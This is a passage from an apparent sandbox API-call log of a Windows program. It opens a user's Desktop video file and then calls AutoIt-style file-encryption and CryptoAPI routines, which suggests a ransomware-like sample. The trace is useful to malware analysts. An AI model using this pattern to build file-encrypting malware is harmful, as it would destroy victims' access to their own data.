[0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0124.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.041] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0124.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0124.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.041] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0124.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0124.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0124.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ldhr.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0124.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0124.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.044] FreeLibrary (hLibModule=0x772d0000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.045] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.045] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.046] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0124.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0124.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0124.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0124.050] CloseHandle (hObject=0x258) returned 1 [0124.050] FreeLibrary (hLibModule=0x772d0000) returned 1 [0124.050] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0124.050] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdf40600, ftCreationTime.dwHighDateTime=0x1d5ebdf, ftLastAccessTime.dwLowDateTime=0x31578900, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x31578900, ftLastWriteTime.dwHighDateTime=0x1d5e365, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="LdhR.mkv", cAlternateFileName="")) returned 0x41ac600 [0124.051] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0124.051] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.051] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0124.051] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0124.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0124.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0124.051] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0124.052] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0124.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.052] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0124.052] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.060] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca8e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0124.060] 